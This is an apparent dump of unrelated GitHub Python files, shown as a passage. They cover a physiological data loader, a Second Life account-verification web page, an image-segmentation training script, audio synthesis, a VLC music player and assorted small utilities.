240),\n                                   ('PetCO2 End Tidal Corrected', 30), ('VO2/ DO2', 30), ('VO2/ DO2', 240),\n                                   ('LV end-diastolic', 30), ('LV end-diastolic', 240)] #List of (field, timepoint) tuples to loop through for the timepoints of interest. (A duplicate PetCO2 entry was removed.)\n        for Parameter in SingleIntrestParameters:\n            #Extract single timepoints of interest for COX hazard analysis.\n            Dataset = SA1DataManipulation.SingleTimePointExtraction(Dataset=Dataset, field=Parameter[0], TimePoint=Parameter[1])\n\n        # List of tuples of the form (field, Max or min) to loop through for the max or min values; False gives you the minimum\n        MaxMinParameters = [('Ao mean', False), ('PetCO2 End Tidal Corrected', False), ('Heart rate LV', True), ('VO2/ DO2', True),\n                            ('LV end-diastolic', True), ('CCI', False), ('SVRI', True), ('Lactate Ao or PA (OPTI)', True),\n                            ('LV dP/dt min', True)]\n        for Parameter in MaxMinParameters:\n            #Find the min/max of the following parameters per animal for the cox proportional hazard model.\n            Dataset = SA1DataManipulation.ProduceMinMaxValues(Dataset=Dataset, field=Parameter[0], FindMax=Parameter[1])\n\n\n        print(\"Total Dataset Loaded and processed at {0} seconds\".format(time.time() - timeTotal))\n\n\n\n\n        # Save the dataset to the cache. (Maybe date the caches, though that might lead to file inflation.)\n
        print('Caching dataset to disk.')\n        if not os.path.isdir('cashe'):\n            os.mkdir('cashe')  # make sure the cache directory exists before dumping (an old 'elif not CasheExists' branch tried to do this, but it was unreachable: the first branch already runs whenever the cache is missing)\n        with open(os.path.join('cashe', CasheFilename), 'wb') as f:\n            pickle.dump(Dataset, f)\n        print('Cache dumped to disk at {0} '.format(time.time() - timeTotal))\n\n    else:\n        #Load the dataset from disk.\n        with open(os.path.join('cashe',CasheFilename), 'rb') as f:\n            Dataset = pickle.load(f)\n        print('Cache loaded from disk in {0} '.format(time.time() - timeTotal))\n\n    return Dataset\n\nif __name__ == \"__main__\":\n\n    #Run the analysis starting from the master Excel sheets.\n    Dataset = StandardLoadingFunction(useCashe=False)\n\n    #Run the standard loader using the cache; good for testing new functions that don't depend on changes in input data.\n    # Dataset = StandardLoadingFunction(useCashe=True)\n\n\n\n    Ao = selectData(Dataset)\n\n\n    # # for group in Ao.keys():\n    #     frameLst.append(pd.DataFrame(data= np.transpose(Ao[group]), index=Time))\n    # dfTot = pd.join(frameLst, keys= Ao.keys())\n\n\n    # Run for KM analysis\n    # survivalPlot(Dataset)\n\n    #This was for before we had the data divided into groups\n    #Dataset = Randomize_groups(Dataset)\n\n    # integrate the deaths classifier\n    DeathsClass = r\"C:\\Users\\mattm\\Documents\\Gazmuri analysis\\SA1 Analysis\\Experimental Deaths Classification July 12.xlsx\"\n\n\n    Dataset = generalizedExcelLoader(dataset=Dataset, path=DeathsClass, AddFields=['Hemodynamic', 'Neurologic'])\n\n    #Add the ratio of blood withdrawn by weight in kg; after the 30 min mark, use the estimated blood withdrawn.\n    Dataset = SA1DataManipulation.BloodWithdrawnPerKg(Dataset)\n\n\n\n    #Run when you want to reproduce figures;
 I have a whole function set up to store those!\n    # MSCPlots(Dataset)\n    #Run to produce an xlsx file for spss to import.\n    SPSSExport(Dataset)\n    #Run to produce an xlsx file for Sigma plot.\n    SigmaPlotExport(Dataset)\n    #Produce the descriptives sheet for easy identification of outlier values.\n    DescriptivesExport(Dataset)\n\n    #Make a sound when the program finishes so I know it's done!\n    duration = 500  # milliseconds\n    freq = 450  # Hz\n    winsound.Beep(freq, duration)\n    print(\"Program finished successfully, that IS what you wanted right?\")\n\n\n\"\"\"\nDate\nSeries\nBlock\nIntervention\nSplenic flow\nexperimentNumber\nTime\nHESDelivered\nPCO2 PV difference\npCO2 Art-ETCo2 difference\npCO2 A-ETCo2 %\nAo mean Time 30\nAo mean Time 60\nAo mean Time 240\nLactate Ao (OPTI) Time 240\nPetCO2 End Tidal Corrected Time 30\nSVRI\nPVRI\nDO2I\nVO2I\nVO2/ DO2\nVO2/ DO2 Time 30\nVO2/ DO2 Time 240\nLV end-diastolic Time 30\nLV end-diastolic Time 240\nAo mean Min\nPetCO2 End Tidal Corrected Min\nHeart rate LV Max\nVO2/ DO2 Max\nLV end-diastolic Max\nSVRI Max\nLactate Ao or PA (OPTI) Max\nWeight\nTime ketamine injection\nTime LL/TBI\nPreparation time\nSurvival time\nSurvival 240 minutes\nSurvival 72 hours\nLiver Lacerations\nEstimated blood loss\nImpactor depth\nImpactor speed\nImpactor dwell time\nHES Infused\nHES\nDural tear\nLeft hemisphere volume\nLeft hemisphere injury\nRight hemisphere volume\nRight hemisphere injury\nEKG Heart Rate\nAo systolic\nAo diastolic\nRA systolic\nRA diastolic\nPA systolic\nPA diastolic\nLV systolic\nLV end-diastolic\nHeart rate LV\nLV dP/dt max\nLV dP/dt min\nICP\nCCO\nPetCO2\nPiCO2\nRespiratory Rate\nTemperature PA\nBlood Removed\nTemperature X\nR Ao\nK Ao\nAngle Ao\nMA Ao\nPMA Ao\nG Ao\nEPL Ao\nA Ao\nCI Ao\nLY30 Ao\nR Ven\nK Ven\nAngle Ven\nMA Ven\nPMA Ven\nG Ven\nEPL Ven\nA Ven\nCI Ven\nLY30 Ven\ntHg Ao (AVOX)\nO2Hb Ao (AVOX)\nCOHb Ao (AVOX)\nMetHb Ao (AVOX)\nO2Ct Ao (AVOX)\nO2Cap Ao (AVOX)\nsO2 Ao (AVOX)\npH Ao (OPTI)\npCO2 Ao (OPTI)\npO2 Ao (OPTI)\nBE Ao (OPTI)\ntCO2 Ao (OPTI)\nHCO3 Ao (OPTI)\nstHCO3 Ao (OPTI)\ntHB Ao (OPTI)\nSO2 Ao (OPTI)\nHCT Ao (OPTI)\nLactate Ao (OPTI)\ntHg PA (AVOX)\nO2Hb PA (AVOX)\nCOHb PA (AVOX)\nMetHb PA (AVOX)\nO2Ct PA (AVOX)\nO2Cap PA (AVOX)\nsO2 PA (AVOX)\npH PA (OPTI)\npCO2 PA (OPTI)\npO2 PA (OPTI)\nBE PA (OPTI)\ntCO2 PA (OPTI)\nHCO3 PA (OPTI)\nstHCO3 PA (OPTI)\ntHB PA (OPTI)\nSO2 PA (OPTI)\nHCT PA (OPTI)\nLactate PA (OPTI)\npH Ao (OPTI ELYTE)\ntCO2 Ao (OPTI ELYTE)\nHCO3 Ao (OPTI ELYTE)\nNa+ Ao (OPTI ELYTE)\nK+ Ao (OPTI ELYTE)\nCl- Ao (OPTI ELYTE)\nCa++ Ao (OPTI ELYTE)\nAnGap Ao (OPTI ELYTE)\nnCa++ Ao (OPTI ELYTE)\npH Ven (OPTI ELYTE)\ntCO2 Ven (OPTI ELYTE)\nHCO3 Ven (OPTI ELYTE)\nNa+ Ven (OPTI ELYTE)\nK+ Ven (OPTI ELYTE)\nCl- Ven (OPTI ELYTE)\nCa++ Ven (OPTI ELYTE)\nAnGap Ven (OPTI ELYTE)\nnCa++ Ven (OPTI ELYTE)\nBSA\nHufner's Number\nAo mean\nRA mean\nPA mean\nCerebral PP Sys-ICP\nCerebral PP MAP-ICP\nPetCO2 End Tidal Corrected\nCaO2\nCvO2\nCCI\nStroke Volume Index\nLeft Ventricular Stroke Work Index\nCardiac Stroke Work Index\nRight Ventricular Stroke Work Index\nSVRI\nPVRI\nDO2I\nVO2I\nVO2/ DO2\nNeurological deficit exam score part 1\nNeurological deficit exam score part 2\nNeurological deficit exam score total\nFood acquisition test time 1\nFood acquisition test error score 1\nFood acquisition test time 2\nFood acquisition test error score 2\nFood acquisition test time 3\nFood acquisition test error score 3\nFood acquisition test time 4\nFood acquisition test error score 4\nFood acquisition test time 5\nFood acquisition test error score 
5\nNovel object discrimination index\n\nBloodLossByKg\nR Ao or Ven\nK Ao or Ven\nAngle Ao or Ven\nMA Ao or Ven\nPMA Ao or Ven\nG Ao or Ven\nEPL Ao or Ven\nA Ao or Ven\nCI Ao or Ven\nLY30 Ao or Ven\ntHg Ao or PA (AVOX)\nO2Hb Ao or PA (AVOX)\nCOHb Ao or PA (AVOX)\nMetHb Ao or PA (AVOX)\nO2Ct Ao or PA (AVOX)\nO2Cap Ao or PA (AVOX)\nsO2 Ao or PA (AVOX)\npH Ao or PA (OPTI)\npCO2 Ao or PA (OPTI)\npO2 Ao or PA (OPTI)\nBE Ao or PA (OPTI)\ntCO2 Ao or PA (OPTI)\nHCO3 Ao or PA (OPTI)\nstHCO3 Ao or PA (OPTI)\ntHB Ao or PA (OPTI)\nSO2 Ao or PA (OPTI)\nHCT Ao or PA (OPTI)\nLactate Ao or PA (OPTI)\npH Ao or Ven (OPTI ELYTE)\ntCO2 Ao or Ven (OPTI ELYTE)\nHCO3 Ao or Ven (OPTI ELYTE)\nNa+ Ao or Ven (OPTI ELYTE)\nK+ Ao or Ven (OPTI ELYTE)\nCl- Ao or Ven (OPTI ELYTE)\nCa++ Ao or Ven (OPTI ELYTE)\nAnGap Ao or Ven (OPTI ELYTE)\nnCa++ Ao or Ven (OPTI ELYTE)\n\n\"\"\"","repo_name":"mattmaggio19/GazmuriPython","sub_path":"SA1DataLoader.py","file_name":"SA1DataLoader.py","file_ext":"py","file_size_in_byte":53755,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"}
{"seq_id":"34881713609","text":"# Code was released into the public domain by Darien Caldwell\r\n# http://forums.secondlife.com/showthread.php?t=323981\r\n\r\nimport cgi\r\nimport urllib\r\nimport logging\r\nimport lindenip\r\nimport os\r\nimport relations\r\nimport time\r\nimport datetime\r\nimport string\r\nfrom model import GoogleSLIds\r\nfrom random import choice\r\nfrom google.appengine.api import users\r\nfrom google.appengine.ext import webapp\r\nfrom google.appengine.ext.webapp.util import run_wsgi_app\r\nfrom google.appengine.ext import db\r\n\r\n\r\n\r\n# NOTE: the HTML markup inside the three template strings below was stripped somewhere along the way; the tags used here are a minimal, best-guess reconstruction (only the 'username' field name is confirmed by the POST handler below).\r\nhead = '''<html>\r\n<head>\r\n<title>webinterface</title>\r\n</head>\r\n<body>\r\n'''\r\nend = '''\r\n</body>\r\n</html>\r\n'''\r\nform = '''\r\n
<form action=\"/\" method=\"post\">\r\nVerify an account you own. Enter your user name:\r\n<input type=\"text\" name=\"username\">\r\n<input type=\"submit\" value=\"Verify\">\r\n</form>\r\n'''\r\n\r\ndef GenVeriCode(length=4, chars=string.letters + string.digits):\r\n    return ''.join([choice(chars) for i in range(length)])\r\n
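# For example, GenVeriCode() might return something like 'aB3k' -- four characters drawn from [a-zA-Z0-9].\r\n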
class MainPage(webapp.RequestHandler):\r\n\r\n    def get(self):\r\n        user = users.get_current_user()\r\n        userid = user.user_id()\r\n        q1 = GoogleSLIds.all().filter(\"google_id =\", userid)\r\n        q2 = GoogleSLIds.all().filter(\"google_id =\", userid)\r\n        q3 = GoogleSLIds.all().filter(\"google_id =\", userid)\r\n        if q1.count() == 0:\r\n            message = '''\r\n            You do not have any SL names linked to this account. Enter a SL username to be verified. You will get an IM to complete the verification.\r\n            <br>\r\n            '''+form\r\n            self.response.out.write(head+message+end)#prompt to add name to list\r\n        else:\r\n            q1.filter(\"verifed =\", True)  # ('verifed' is the actual datastore property name, so the misspelling has to stay in queries)\r\n            if not q1.count() == 0:\r\n                message = \"Verified names:<br>\"\r\n                for x in q1:\r\n                    message += x.sl_name+\"<br>\"\r\n                    av = x.sl_key\r\n                    subdictown = {}\r\n                    subdictsecown = {}\r\n                    ownersubs = relations.getby_subj_type(av, 'owns')\r\n                    for sub in ownersubs:\r\n                        id = sub.obj_id\r\n                        if id not in subdictown:\r\n                            subdictown[id] = relations.key2name(id)\r\n                        else:\r\n                            #delete duplicates\r\n                            sub.delete()\r\n\r\n                    secownersubs = relations.getby_subj_type(av, 'secowns')\r\n                    for sub in secownersubs:\r\n                        id = sub.obj_id\r\n                        if id not in subdictown and id not in subdictsecown:#since you can be both an owner and a secowner, ignore those already in the owner list (the old '(subdictown or subdictsecown)' expression only ever checked one dict)\r\n                            subdictsecown[id] = relations.key2name(id)\r\n\r\n                    out = ''\r\n                    # (the format strings below originally carried markup that was stripped; '%s %s' is a guess that at least keeps both arguments)\r\n                    for sub in subdictown:\r\n                        out += '%s %s own<br>' % (sub, subdictown[sub])\r\n                    for sub in subdictsecown:\r\n                        out += '%s %s secown<br>' % (sub, subdictsecown[sub])\r\n                    message += out\r\n                q2.filter(\"verifed =\", False)\r\n                if not q2.count() == 0:\r\n                    message += \"You have the following names waiting to be verified:<br>\"\r\n                    for x in q2:\r\n                        message += x.sl_name+\"<br>\"\r\n                    message += form\r\n                #at least one account verified\r\n                self.response.out.write(head+message+end)\r\n            else:\r\n                message = \"You have the following names waiting to be verified:<br>\"\r\n                results = q2.fetch(10) \r\n                for x in results:\r\n                    message += x.sl_name+\"<br>\"\r\n                message += form\r\n                self.response.out.write(head+message+end)#show the accounts not yet verified and prompt for more\r\n\r\n    def post(self):\r\n        user = users.get_current_user()\r\n        a = GoogleSLIds().gql(\"WHERE google_id = :1 AND sl_name = :2\", user.user_id(), self.request.get(\"username\")).get()\r\n        if (a is None):\r\n            a = GoogleSLIds()\r\n        if not (a.verifed):\r\n            a.google_id = user.user_id()\r\n            a.google_email = user.email()\r\n            a.sl_name = self.request.get(\"username\")\r\n            a.sl_key = relations.name2key(a.sl_name)\r\n            a.datetime = datetime.datetime.utcnow()\r\n            a.vericode = GenVeriCode()\r\n            if a.sl_key is not None:\r\n                #notify in world object\r\n                a.sentim = False\r\n                logging.info('%s asked to be linked to %s and was found in the database' % (a.google_email, a.sl_name))\r\n            else:\r\n                a.sentim = True #cannot send an IM so mark as sent.\r\n                logging.info('%s asked to be linked to %s but was not found in the database.' % (a.google_email, a.sl_name))\r\n            a.put()\r\n            message = '''\r\nIf we have records of '''+a.sl_name+''' then an IM has been sent. \r\n
<br>\r\nEnter a SL username to be verified. You will get an IM to complete the verification.\r\n<br>\r\n'''+form\r\n        else:\r\n            message = '''\r\nYou have already verified '''+a.sl_name+'''. \r\n<br>\r\nEnter a SL username to be verified. You will get an IM to complete the verification.\r\n<br>\r\n'''+form\r\n        self.response.out.write(head+message+end)\r\n\r\napplication = webapp.WSGIApplication(\r\n                                     [('.*', MainPage)\r\n                                      ], \r\n                                     debug=True) \r\n\r\ndef main():\r\n    run_wsgi_app(application)\r\n\r\nif __name__ == \"__main__\":\r\n    main()","repo_name":"nirea/collarcmds","sub_path":"webinterface.py","file_name":"webinterface.py","file_ext":"py","file_size_in_byte":5776,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"82"}
{"seq_id":"27769601265","text":"\nimport numpy as np\nfrom tensorflow.python.keras.callbacks import ReduceLROnPlateau\n\nimport outher_Value_and_func as dg\nimport os\n# np.random.randint(0 ,25)  # leftover no-op call (its result was discarded), commented out\nos.environ['SM_FRAMEWORK'] = 'tf.keras'\nfrom keras.optimizers import *\nimport cv2\nfrom datetime import datetime\nfrom os import listdir\nfrom os.path import isfile, join\nimage_dim = (192, 192)\nfrom tensorflow import keras\n\ndef ReadData():\n    # ToDo:\n    # ReadData\n    return images_img,images_mask\n
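# ReadData is intentionally left as a stub by the author. Judging from its use below, it is expected to return (images, masks) as arrays that converNumpy/train_test_split can consume -- e.g. HxWx3 images and single-channel masks of the same spatial size (an assumption; the original loading code was removed).\n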
y_test.shape)\nprint('+++++++++++++++++++++++++++++++++++++++++++++++++')\n# ]\n\nX_train = X_train.astype(np.float32) / 255\ny_train = y_train.astype(np.float32)\nX_test = X_test.astype(np.float32) / 255\ny_test = y_test.astype(np.float32)\nimport segmentation_models as sm\n\n# model_idx_listeeee\n\npred_test_list = []\npred_test_id = []\n# continue\nmodel_idx=15\nkeras.backend.clear_session()\n\nimport tensorflow as tf\n\nphysical_devices = tf.config.list_physical_devices('GPU')\ntf.config.experimental.set_memory_growth(physical_devices[0], True)\n\nif y_train.shape[-1]==1:\n classes = 1\n activation='sigmoid'\nelse:\n classes = 2\n activation='softmax'\n\nimg_row, img_colum, img_channels = X_train.shape[1], X_train.shape[2], X_train.shape[3]\ninput_shape = (img_row, img_colum, img_channels)\n\nmodel = None\n# tf.tpu.experimental.initialize_tpu_system(tpu)\nkeras.backend.clear_session()\ntf.keras.backend.clear_session()\n\n\nmodel, modelName = GetModel(input_shape, classes, activation)\nmodel.summary()\n\nlr = 0.0001\n\nprint(\"---------> lr:\", lr)\nmodel.compile(optimizer=Adam(lr=lr), loss=sm.losses.binary_crossentropy,\n metrics=[sm.metrics.iou_score, sm.metrics.f1_score])\n\n\nprint('-----------------------------------------------------------------------------------------------------------------------')\ncallback, logdir=dg.getColback('Dnm_' + modelName +'_' + str(model_idx) + '_' + Dataset, \"./\", model)\n\nprint('tensorboard --logdir=\\''+logdir+'\\'')\n\nnow = datetime.now()\ncurrent_time_bas = now.strftime(\"%d %m %H:%M:%S.%f\")\n\nautoencoder_train = model.fit(X_train, y_train,batch_size=batch_size\n ,epochs=100,verbose=2)\n\nnow = datetime.now()\ncurrent_time_son = now.strftime(\"%H:%M:%S.%f\")\n\nnow = datetime.now()\ncurrent_time_bas_evaluate= now.strftime(\"%H:%M:%S.%f\")\nTestSonuc = model.evaluate(X_test, y_test,\n batch_size=batch_size, verbose=2)\n\nnow = datetime.now()\ncurrent_time_son_evaluate = now.strftime(\"%H:%M:%S.%f\")\n# sonuc=[]\nsonuc=[modelName+'_'+'/'+str(model.optimizer.lr.numpy())]\n\nsonuc.append(Dataset)\npred_test= model.predict(X_test, batch_size=batch_size)\nsonuc = result_treshold_05_jaccard_score_f1score(sonuc, y_test, pred_test)\n\nprint(sonuc)\nprint(sonuc)\n\n\n\n\n\n","repo_name":"mturkoglu23/Inc-ZOEA","sub_path":"model_traning.py","file_name":"model_traning.py","file_ext":"py","file_size_in_byte":5636,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"33324609974","text":"from dataclasses import dataclass\nfrom typing import Optional\n\nfrom contrib.handlers.message.context_manager._utils import make_prop\n\n\n@dataclass\nclass FakeContext:\n str_data: Optional[str] = None\n integer: Optional[int] = None\n\n\ndef test_make_prop():\n prop = make_prop(FakeContext.str_data, FakeContext, 2)\n assert prop.name == 'str_data'\n assert prop.type == str\n\n prop = make_prop(FakeContext.integer, FakeContext, 2)\n assert prop.name == 'integer'\n assert prop.type == int\n","repo_name":"gakawarstone/gkbot","sub_path":"bot/tests/contrib/test_make_prop.py","file_name":"test_make_prop.py","file_ext":"py","file_size_in_byte":501,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"82"} +{"seq_id":"8755258088","text":"import json\nfrom bson import json_util\nimport pipes\nfrom os import getenv, environ, path\n\ndef init_json_env(env) -> None:\n '''\n init env from json file\n if env not exist, pass it\n '''\n try:\n secrets = path.join(\n 
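path.dirname(path.dirname(__file__)),\n            f'config.{env}.json'\n        )\n        # e.g. init_json_env('dev') resolves to <project root>/config.dev.json\n        # (hypothetical call; the layout is inferred from the path join above)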
\n        with open(secrets, 'r') as json_file:\n            for k, v in json.load(json_file).items():\n                k = pipes.quote(k)\n                v = pipes.quote(v)\n                environ[k] = v  # export the sanitised pair into the process environment\n    except FileNotFoundError:\n        return None\n    \ndef parse_json(data):\n    # json.loads() takes no encoding kwarg on Python 3.9+; dumps() already returns str\n    return json.loads(json_util.dumps(data))","repo_name":"dev4hobby/amazon-japan-vinyl-alert","sub_path":"serverless/modules/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":572,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"82"}
{"seq_id":"21797548315","text":"import cv2\nimport time\n\ncap = cv2.VideoCapture(0)\n\nfor i in range(3, 0, -1):\n\tprint(i)\n\ttime.sleep(1)\n\nret, frame = cap.read()\n\nif ret:\n\tcv2.imwrite(\"myPic.jpg\", frame)\nelse:\n\tprint(\"Failed :(\")\n\ncap.release()\ncv2.destroyAllWindows()\n","repo_name":"berkobob/cv2","sub_path":"takePic.py","file_name":"takePic.py","file_ext":"py","file_size_in_byte":235,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"}
{"seq_id":"29118999324","text":"from sython.concurrent import sf_parallel\nfrom com.nerdscentral.audio.core import SFMemoryZone\nfrom sython.utils.Generative import PrimeRange, tweakRandom\nfrom sython.voices.ResonantVoices import make_addtive_resonance\n\ndullRange = PrimeRange(biggerThan = 9, lessThan = 30, divisor = 10.0)\nbrightRange = PrimeRange(biggerThan = 9, lessThan = 120, divisor = 10.0)\n\n@sf_parallel\ndef primeBell(frequency = 440 , brightness = 1.0, length = 10000, hit = 1.0, isBowl = True):\n\n    with SFMemoryZone():\n        saturate = 0.0\n        qCorrect = 3.0\n        if frequency > 2000:\n            # Ouch.\n            frequency *= 0.5\n            saturate = 0.1\n            qCorrect = 1.0\n\n        qc = 1.0 if brightness < 2.0 else 3.0\n        harmonics = dullRange if brightness < 2.0 else brightRange\n        harmonics = tweakRandom(harmonics(), 0.05)\n\n        if isBowl:\n            length += 4000 + length\n\n        with SFMemoryZone():\n            gen = make_addtive_resonance(\n                qCorrect = qCorrect,\n                post = None,\n                rollOff = 3.0,\n                power = brightness,\n                harmonics = harmonics,\n                seed = -40,\n                saturate = saturate\n            )\n            sig = gen(length, frequency).keep()\n\n        sig = sf.Mix(\n            sig,\n            sf.RBJLowPass(\n                sf.Multiply(\n                    sf.WhiteNoise(30),\n                    sf.LinearShape((0, hit/4.0), (30,0))\n                ),\n                frequency * 4.0,\n                2.0\n            )\n        )\n\n        peak = 2000 if isBowl else 1\n        env = sf.LinearShape(\n            (0, frequency if isBowl else 18000),\n            (peak, 18000 if isBowl else frequency * 4.0),\n            (length, frequency)\n        )\n        res = sf.LinearShape((1, 1.0),(length,3.0 if isBowl else 1.5))\n        sig = sf.ShapedRBJLowPass(sig, env, res)\n\n        # A mixture of linear and exponential enveloping.\n        env = sf.Multiply(\n            sf.LinearShape(\n                (0, 0),\n                (peak, 1),\n                (length, 0)),\n            sf.ExponentialShape((0, 0), (peak, 0), (length, -30))\n        )\n        out = sf.FixSize(sf.Multiply(env, sig))\n    return out.keep()\n\n","repo_name":"SonicField/SonicFieldRepo","sub_path":"SonicField/src/sython/resonant/Bells.py","file_name":"Bells.py","file_ext":"py","file_size_in_byte":2237,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"82"}
{"seq_id":"20877657087","text":"\"\"\"\r\nhttps://stackoverflow.com/questions/64283087/how-would-i-make-this-stream-a-playlist-and-also-not-stop-responding-when-you-hi\r\n\"\"\"\r\n\r\nimport vlc\r\nimport pafy\r\nimport time\r\nfrom tkinter import *\r\n\r\nclass Window(Frame):\r\n    def __init__(self, master = None):\r\n        \r\n        Frame.__init__(self,master)\r\n        self.master = master\r\n\r\n        self.init_window()\r\n\r\n    def 
init_window(self):\r\n self.master.title('Lofi.Chill')\r\n\r\n self.pack(fill=BOTH, expand=1)\r\n\r\n play_button = Button(self, text = 'play me some lofi', command=self.happy_song)\r\n play_button.place(x=0,y=0)\r\n\r\n quit_button = Button(self, text = 'quit', command=self.client_exit)\r\n quit_button.place(x=200,y=0)\r\n\r\n\r\n def client_exit(self):\r\n exit()\r\n \r\n def happy_song(self):\r\n Stream('https://www.youtube.com/watch?v=XN41UJ7EZ4E&ab_channel=Andrela-Chxn')\r\n\r\nclass Stream:\r\n def __init__(self, url):\r\n self.url = url\r\n\r\n video = pafy.new(url)\r\n best = video.getbestaudio()\r\n playurl = best.url\r\n\r\n instance = vlc.Instance()\r\n player = instance.media_player_new()\r\n media = instance.media_new(playurl)\r\n\r\n media.get_mrl()\r\n\r\n player.set_media(media)\r\n player.play()\r\n \r\n while True:\r\n time.sleep(1)\r\n\r\n\r\n\r\nroot = Tk()\r\nroot.geometry(\"400x300\")\r\napp = Window(root)\r\nroot.mainloop() ","repo_name":"kendfss/misc","sub_path":"2020/vlcplaying.py","file_name":"vlcplaying.py","file_ext":"py","file_size_in_byte":1417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"1291350229","text":"import re\nfrom templates.psql import *\n\ndef get_lang_sql():\n cur.execute('''SELECT name FROM LANGUAGES''')\n lang = cur.fetchall()\n languages = []\n for i in range (len(lang)):\n languages.append(''.join(lang[i]))\n return languages\n\ndef create_table(table_name, columns):\n columns = re.sub(r\"'|:|{|}\", \"\", str(columns))\n cur.execute(f\"CREATE TABLE IF NOT EXISTS {table_name}({columns})\")\n c.commit()\n","repo_name":"witkiewiczmikolaj/helbreder","sub_path":"core/app/templates/sql.py","file_name":"sql.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"82"} +{"seq_id":"24260929359","text":"# Written by Mara Fennema\n#\n# Plots the loss of the LSTM from train.py\n\nimport numpy as np\nimport os\nimport shutil\nimport matplotlib.pyplot as plt\n\n\npath = \"PATH-TO-LOSS-FILE\"\n\nf = open(path, \"r\")\n\ny = []\nif f.mode == 'r':\n f1 = f.readlines()\n\n for line in f1:\n y.append(float(line[:2]))\n\n# Calculate x-axis\nndatapoints = len(y)\nmaxX = 50*ndatapoints\nx = list(range(0, maxX, 50))\n\n# Calculate the trendline of all the datapoints\nz = np.polyfit(x, y, 1)\np = np.poly1d(z)\n\nplt.plot(x, y, label=\"Loss\")\nplt.plot(x, p(x), color=\"r\", linestyle=\"dashed\", label=\"Average\")\nplt.hlines(22.02122688293457, xmin=x[0], xmax=x[-1:], colors=\"m\",linestyles=\"solid\", label=\"Loss of average pitch\")\nplt.title(\"Loss over time\")\nplt.ylabel(\"Loss\")\nplt.xlabel(\"Iterations\")\nplt.legend()\nplt.show()\n","repo_name":"maradf/Pitch-Prediction-And-Pitch-Classification","sub_path":"plotLoss.py","file_name":"plotLoss.py","file_ext":"py","file_size_in_byte":791,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"1901076295","text":"import collections\nimport functools\nimport sys\nfrom pathlib import Path\nfrom typing import Dict, List\n\nimport seutil as su\n\nfrom teco.data.cg import CallGraph\nfrom teco.data.pesudo_structures import PesudoStructures\nfrom teco.data.structures import (\n ClassStructure,\n Consts,\n FieldStructure,\n Insn,\n MethodStructure,\n)\n\nlogger = su.log.get_logger(__name__)\n\n\nclass ClassResolutionException(Exception):\n pass\n\n\nclass MethodResolutionException(Exception):\n pass\n\n\nclass 
FieldResolutionException(Exception):\n pass\n\n\nclass RawDataLoader:\n def __init__(self, indexed: bool = False):\n # increase recursion limit to be able to load some crazy code with long BinaryExpr chain\n sys.setrecursionlimit(10000)\n\n self.indexed = indexed\n\n # currently loaded project\n self.loaded_proj_data_dir = None\n\n # project raw data space\n self.classes: List[ClassStructure] = []\n self.methods: List[MethodStructure] = []\n self.fields: List[FieldStructure] = []\n self.cg: CallGraph = None\n\n # persistent JRE data during collection; they always take up the lower indices\n self.classes_jre: List[ClassStructure] = []\n self.methods_jre: List[MethodStructure] = []\n self.fields_jre: List[FieldStructure] = []\n\n # extra raw data space for pesudo structures; they start from a very high index\n self.classes_extra: List[ClassStructure] = PesudoStructures.get_classes()\n self.methods_extra: List[MethodStructure] = PesudoStructures.get_methods()\n self.fields_extra: List[FieldStructure] = PesudoStructures.get_fields()\n\n if self.indexed:\n # class, method, and field indexes\n self.iname2cid: Dict[str, ClassStructure] = {}\n self.cid2namedesc2mid: Dict[int, Dict[str, int]] = collections.defaultdict(\n dict\n )\n self.cid2name2fid: Dict[int, Dict[str, int]] = collections.defaultdict(dict)\n\n def load_jre_data(self, jre_data_dir: Path):\n self.classes_jre = su.io.load(\n jre_data_dir / \"joint.class.json\", clz=List[ClassStructure]\n )\n self.methods_jre = su.io.load(\n jre_data_dir / \"joint.method.json\", clz=List[MethodStructure]\n )\n self.fields_jre = su.io.load(\n jre_data_dir / \"joint.field.json\", clz=List[FieldStructure]\n )\n\n def get_class(self, cid: int) -> ClassStructure:\n if cid >= PesudoStructures.reserved_cid_begin:\n return self.classes_extra[cid - PesudoStructures.reserved_cid_begin]\n else:\n return self.classes[cid]\n\n @property\n def all_classes(self) -> List[ClassStructure]:\n return self.classes + self.classes_extra\n\n def get_method(self, mid: int) -> MethodStructure:\n if mid >= PesudoStructures.reserved_mid_begin:\n return self.methods_extra[mid - PesudoStructures.reserved_mid_begin]\n else:\n return self.methods[mid]\n\n @property\n def all_methods(self) -> List[MethodStructure]:\n return self.methods + self.methods_extra\n\n def get_field(self, fid: int) -> FieldStructure:\n if fid >= PesudoStructures.reserved_fid_begin:\n return self.fields_extra[fid - PesudoStructures.reserved_fid_begin]\n else:\n return self.fields[fid]\n\n @property\n def all_fields(self) -> List[FieldStructure]:\n return self.fields + self.fields_extra\n\n def load_project_data(self, proj_data_dir: Path) -> bool:\n if self.loaded_proj_data_dir == proj_data_dir:\n return False\n\n self.classes.clear()\n self.classes += self.classes_jre\n self.methods.clear()\n self.methods += self.methods_jre\n self.fields.clear()\n self.fields += self.fields_jre\n\n # load project data\n self.classes += su.io.load(\n proj_data_dir / \"joint.class.json\", clz=List[ClassStructure]\n )\n if len(self.classes) >= PesudoStructures.reserved_cid_begin:\n raise RuntimeError(f\"Too many classes: {len(self.classes)}\")\n self.methods += su.io.load(\n proj_data_dir / \"joint.method.json\", clz=List[MethodStructure]\n )\n if len(self.methods) >= PesudoStructures.reserved_mid_begin:\n raise RuntimeError(f\"Too many methods: {len(self.methods)}\")\n self.fields += su.io.load(\n proj_data_dir / \"joint.field.json\", clz=List[FieldStructure]\n )\n if len(self.fields) >= PesudoStructures.reserved_fid_begin:\n 
